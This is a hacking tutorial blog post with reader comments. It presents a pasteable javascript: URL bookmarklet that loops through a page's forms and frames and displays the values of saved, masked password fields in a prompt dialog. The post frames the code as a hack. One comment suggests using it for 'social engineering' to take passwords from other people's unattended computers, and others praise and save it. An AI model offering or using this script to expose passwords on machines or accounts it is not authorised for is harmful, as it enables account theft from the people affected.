How To: Reveal Saved Browser Passwords with JavaScript Injections

Reveal Saved Browser Passwords with JavaScript Injections

JavaScript is the language of the internet. It is what allows us to create dynamic, interesting webpages that are fast, web-based applications and so much more. The primary use of JavaScript is to write functions that are embedded in or included from HTML pages and that interact with the Document Object Model (DOM) of the page. This is the magic that allows all of what we see to happen, and for our browser to be manipulated.

What Is JavaScript Used For?

  • Pop up windows. A new window with programmatic control over the size, position, and attributes.
  • Validating input values of a web form to make sure that they are acceptable before being submitted to the server.
  • Changing images as the mouse cursor moves over them in real-time.
  • Creating cookies to save important browser information.
  • Saving browser preferences.
  • Entire browser webkits.
  • Anonymous redirects.
  • Real-time website changes.
  • Command execution based on chronology.
  • Many more.

As you can see, JavaScript controls a lot of what we see on the internet. However, since it can also control our browser at such a low level, we can manipulate forms and webpages to do things that they weren't normally intended for. Today in Null Byte, we are going to do a cool, quick JavaScript hack that can reveal browser passwords that are stored by manipulating the browser.

How to Reveal Saved Browser Passwords with JavaScript Injections

The Code

Paste this code into the URL field in your browser to reveal stored passwords (you must be at a website the shows the asterisks on the screen):

javascript: var p=r(); function r(){var g=0;var x=false;var x=z(document.forms);g=g+1;var w=window.frames;for(var k=0;k<w.length;k++) {var x = ((x) || (z(w[k].document.forms)));g=g+1;}if (!x) alert('Password not found in ' + g + ' forms');}function z(f){var b=false;for(var i=0;i<f.length;i++) {var e=f[i].elements;for(var j=0;j<e.length;j++) {if (h(e[j])) {b=true}}}return b;}function h(ej){var s='';if (ej.type=='password'){s=ej.value;if (s!=''){prompt('Password found ', s)}else{alert('Password is blank')}return true;}}

Now, as a fun little game, who can tell me why it does it? Leave comments in the forums! Also, come say hi on Twitter and in the IRC! We have loads of new members who idle frequently.

Photo by Freddy The Boy

10 Comments

I am saving that right now. That is just super-useful! It works because it's returning the value of the form as text, not the covering asterisks which are displayed?

Does not work on my browser sadly I have disabled Java-Script as a security precaution also I doubt my browser would simply hand anyone the password store, they would need to authenticate with the master password and PKI security certificate protecting my password store.

Yes :) It would, but It's not going via the password store, when you see the password asterisks on there screen, they've already been entered for the injection to reveal.

Is it not simply returning the value of the form? If it's not just say no if you don't feel like giving it away quite yet :P

That's some handy code, saved.
It's going through each form element on the page, checking if it's of type "password" (it would be automatically masked by asterisk's) then outputting the password (variable s) from that form in a prompt.

*smiley face*^_^

Very useful for a bit of social engineering. Pop on a computer, find the pass you need, nab it, and then go on your way.

Expand on what you mean by social engineering in that context?

hi Admin,

Thanks for this wonderful script.. Great piece of work. But i have problem with my Galaxy S advance , i tried executing but it didnt work, while the same script worked for my tab2.

Could u plz suggest any solution ?
Thanks!!!!

Share Your Thoughts

  • Hot
  • Latest